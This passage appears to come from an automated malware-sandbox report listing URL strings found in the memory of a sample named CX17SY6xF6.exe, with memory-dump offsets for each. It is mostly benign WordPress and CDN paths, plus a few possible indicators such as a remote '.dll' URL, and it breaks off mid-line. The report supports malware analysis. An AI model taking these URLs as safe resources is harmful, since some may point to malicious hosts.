                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.5
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/wlwmanifest.xml
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.681114888.0000000007217000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-json/
                  Source: CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/xmlrpc.php?rsd
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577510464.0000000000E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/c
                  Source: CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/h.dll
                  Source: CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/s
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/
                  Source: CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/4#
                  Source: CX17SY6xF6.exe, 00000000.00000003.584862853.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/M
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.649277876.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/W
                  Source: CX17SY6xF6.exe, 00000000.00000002.886122997.0000000005B4D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wyjzradio.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.699184166.00000000071D9000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071D9000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.681114888.00000000071D9000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.xjgc.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.649277876.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/ma=86400
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.684405138.0000000000E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yoruksut.com/k
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js?ver=1.7.1
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/effects.js?ver=1.9.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js?ver=1.9.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
                  Source: CX17SY6xF6.exe, 00000000.00000002.861071046.0000000000E4C000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.649277876.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.888204578.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.589104954.0000000003A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.css
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js?ver=1.0.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 